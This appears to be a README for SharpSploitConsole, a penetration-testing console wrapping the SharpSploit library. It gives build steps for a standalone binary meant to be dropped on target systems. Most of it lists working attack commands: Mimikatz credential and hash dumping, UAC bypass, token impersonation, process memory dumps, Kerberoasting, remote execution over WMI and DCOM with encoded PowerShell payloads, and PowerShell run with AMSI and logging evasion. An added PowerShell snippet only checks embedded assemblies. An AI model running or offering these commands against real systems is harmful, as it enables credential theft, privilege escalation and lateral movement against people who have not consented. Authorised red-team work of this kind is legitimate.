SharpSploitConsole – Console Application Designed To Interact With SharpSploit


Console application designed to interact with SharpSploit, released by @cobbr_io.
SharpSploit is a tool written by @cobbr_io that combines many techniques and C# code from the infosec community into one sweet DLL. It's awesome, so check it out!

Description
SharpSploit Console is simply a quick proof-of-concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target system and run over a non-interactive shell (such as beacon).
This concept can be applied to many C# binaries. For example, we could embed System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that does not rely on System.Management.Automation.dll being present on the target system.

Contact at:

  • Twitter: @anthemtotheego or @g0ldengunsec

Setup – Quick and Dirty
Note: For those of you who do not want to go through the trouble of compiling your own, I uploaded an x64 and x86 binary, found in the CompiledBinaries folder. For those of you who do want to compile your own… I used Windows 10 and Visual Studio 2017 – mileage may vary.

  1. Download the SharpSploit tool from https://github.com/cobbr/SharpSploit.git
  2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for the correct architecture) – you should see a drop-down showing Any CPU > click on it and open Configuration Manager > under Platform change to the desired architecture and select OK.
  3. Download the SharpSploitConsole tool and open up SharpSploitConsole.sln
  4. Copy both SharpSploit.dll and System.Management.Automation.dll, found in the SharpSploit/bin/x64/Debug directory, into the SharpSploitConsole/bin/x64/Debug folder
  5. Next we'll set up Visual Studio to embed our DLLs into our exe so that we have a single binary to run on our target machine. We do this as follows:

In Visual Studio:
a. Tools > NuGet Package Manager > Package Manager Console
b. Inside the console run:

  Install-Package Costura.Fody

c. Open up Notepad, paste the following code and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj and Properties folders.

    <?xml version="1.0" encoding="utf-8"?>
    <Weavers>
      <Costura />
    </Weavers>
  6. Inside Visual Studio, right-click References on the right-hand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLLs, select them and add them.
  7. Compile, drop the binary on the target computer and have fun.
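To confirm that Costura actually embedded both DLLs before relying on the exe as a standalone binary (the same check works for triaging any .NET assembly packed this way), here is an added PowerShell snippet that is not part of the SharpSploitConsole project. It assumes Windows PowerShell 5.1 on .NET Framework (where ReflectionOnlyLoadFrom is available), a PowerShell process matching the exe's architecture, and takes the path to the compiled exe as a parameter.

```powershell
# Added example: list the assemblies Costura.Fody embedded into a compiled .NET exe.
# Costura stores each merged assembly as a manifest resource named
# "costura.<assemblyname>.dll" or "costura.<assemblyname>.dll.compressed".
# Reflection-only loading inspects the binary without executing any of its code.
param(
    [Parameter(Mandatory = $true)]
    [string]$Path,   # e.g. .\bin\x64\Debug\SharpSploitConsole.exe (assumed output path)
    [string[]]$Expected = @('SharpSploit', 'System.Management.Automation')
)

$asm = [System.Reflection.Assembly]::ReflectionOnlyLoadFrom((Resolve-Path $Path).Path)

# Collect every Costura resource and derive the original assembly name from it.
$embedded = $asm.GetManifestResourceNames() |
    Where-Object { $_ -like 'costura.*.dll*' } |
    ForEach-Object {
        $name = $_ -replace '^costura\.', '' -replace '\.dll(\.compressed)?$', ''
        [pscustomobject]@{
            Resource   = $_
            Assembly   = $name
            Compressed = $_.EndsWith('.compressed')
            Bytes      = $asm.GetManifestResourceStream($_).Length
        }
    }

$embedded | Format-Table -AutoSize

# Report any expected dependency that did not get embedded (Costura lowercases names).
$missing = $Expected | Where-Object {
    $want = $_
    -not ($embedded.Assembly | Where-Object { $_ -ieq $want })
}
if ($missing) {
    Write-Warning ("Not embedded: " + ($missing -join ', ') + " - check FodyWeavers.xml and the added references")
    exit 1
}
Write-Host "All expected assemblies are embedded; the exe no longer needs the DLLs beside it."
```

If a dependency is listed as missing, the most common cause is that the DLL was copied into the output folder but never added under References, so Costura had nothing to weave.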

Examples
Note: All commands are case insensitive.
By default all commands are taken in as command line arguments; they are executed and the program exits (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.
Start interactive console mode:

Interact

Mimikatz all the things (doesn't run DCSync) – requires admin or system:

Mimi-All

Runs a specific Mimikatz command of your choice – requires admin or system:

Mimi-Command privilege::debug sekurlsa::logonPasswords

Runs the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:

logonPasswords

Runs the Mimikatz command to retrieve Domain Cached Credentials hashes from the registry – requires admin or system:

LsaCache

Runs the Mimikatz command to retrieve LSA Secrets stored in the registry – requires admin or system:

LsaSecrets

Retrieve password hashes from the SAM database – requires admin or system:

SamDump

Retrieve Wdigest credentials from the registry – requires admin or system:

Wdigest

Retrieve current user:

whoami
Username

Impersonate system user – requires admin rights:

GetSystem

Impersonate system user – impersonate the token of a specified process, requires PID – command requires admin rights:

Impersonate 2918

Bypass UAC – requires binary | command | path to binary – requires admin rights:

BypassUAC cmd.exe ipconfig C:\Windows\System32
BypassUAC cmd.exe "" C:\Windows\System32

Ends the impersonation of any token, reverts back to the initial token associated with the current process:

RevertToSelf

Retrieve current working directory:

CurrentDirectory

Retrieve current directory listing:

DirectoryListing

Changes the current directory by appending a specified string to the current working directory:

ChangeDirectory SomeFolder

Retrieve hostname:

Hostname

Retrieve list of running processes:

ProcessList

Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin:

ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp

Retrieve registry path value, requires full path argument:

ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber

Write to registry, requires full path argument and value argument:

WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1

Retrieve users of a local group remotely, requires computername | groupname | username | password:

NetLocalGroupMembers computerName Administrators domain\username <password>
NetLocalGroupMembers 192.168.1.20 Administrators .\username <password>

Retrieve local groups remotely, requires computername | username | password:

NetLocalGroups computerName domain\username <password>
NetLocalGroups 192.168.1.20 .\username <password>

Retrieve currently logged-on users remotely, requires computername | username | password:

NetLoggedOnUsers computerName domain\username <password>
NetLoggedOnUsers 192.168.1.20 .\username <password>

Retrieve user sessions remotely, requires computername | username | password:

NetSessions computerName domain\username <password>
NetSessions 192.168.1.20 .\username <password>

Ping systems, requires computernames:

Ping computer1 computer2 computer3 computer4

Port scan systems, requires computername | ports:

PortScan computer1 80 443 445 22 23

Get Domain Users – grabs specified (or all) user objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:

GetDomainUsers

Get Domain Groups – grabs specified (or all) group objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:

GetDomainGroups
GetDomainGroups -target "Domain Admins"

Get Domain Computers – grabs specified (or all) computer objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target:

GetDomainComputers

Perform Kerberoasting – performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default using the current user context. Optional arguments: -username -password -domain -server -searchbase -searchstring -target

Kerberoast
Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService

Run command remotely via WMI, requires computername | username | password | command – requires admin:

WMI computer1 domain\username <password> <entire powershell empire payload>
WMI computer1 .\username <password> powershell -noP -sta -w 1 -enc <Base64>

Run command remotely via DCOM, requires computername | command | directory | params – requires admin:

DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>

Run shell command:

Shell ipconfig /all

Run PowerShell command while attempting to bypass AMSI, ScriptBlock logging, and Module logging:

Powershell -noP -sta -w 1 -enc <Base64>

Currently available options (more to come)

  • Interact : Starts interactive console mode; if you are interacting remotely you may not want to use this option
  • Mimi-All : Executes everything but DCSync, requires admin
  • Mimi-Command : Executes a specific Mimikatz command
  • logonPasswords : Runs privilege::debug sekurlsa::logonPasswords
  • LsaCache : Retrieve Domain Cached Credentials hashes from the registry
  • LsaSecrets : Retrieve LSA secrets stored in the registry
  • SamDump : Retrieve password hashes from the SAM database
  • Wdigest : Retrieve Wdigest credentials from the registry
  • whoami : Retrieve current user
  • GetSystem : Impersonate system user, requires admin rights
  • Impersonate : Impersonate the token of a specified process, requires PID – command requires admin rights
  • BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rights
  • RevertToSelf : Ends the impersonation of any token, reverts back to the initial token associated with the current process
  • CurrentDirectory : Retrieve current working directory
  • DirectoryListing : Retrieve current directory listing
  • ChangeDirectory : Changes the current directory by appending a specified string to the current working directory
  • Hostname : Retrieve hostname
  • ProcessList : Retrieve list of running processes
  • ProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name – requires admin
  • Username : Retrieve current username
  • ReadRegistry : Retrieve registry path value, requires full path argument
  • WriteRegistry : Write to registry, requires full path argument | value
  • NetLocalGroupMembers : Retrieve users of a local group remotely, requires computername | groupname | username | password
  • NetLocalGroups : Retrieve local groups remotely, requires computername | username | password
  • NetLoggedOnUsers : Retrieve currently logged-on users remotely, requires computername | username | password
  • NetSessions : Retrieve user sessions remotely, requires computername | username | password
  • Ping : Ping systems, requires computernames
  • PortScan : Port scan systems, requires computername | ports
  • GetDomainUsers : Grabs specified (or all) user objects in the target domain, by default using the current user context
  • GetDomainGroups : Grabs specified (or all) group objects in the target domain, by default using the current user context
  • GetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default using the current user context
  • Kerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default using the current user context
  • WMI : Run command remotely via WMI, requires computername | username | password | command – requires admin
  • DCOM : Run command remotely via DCOM, requires computername | command | directory | params – requires admin
  • Shell : Run a shell command
  • Powershell : Runs a PowerShell command while attempting to bypass AMSI, ScriptBlock logging, and Module logging
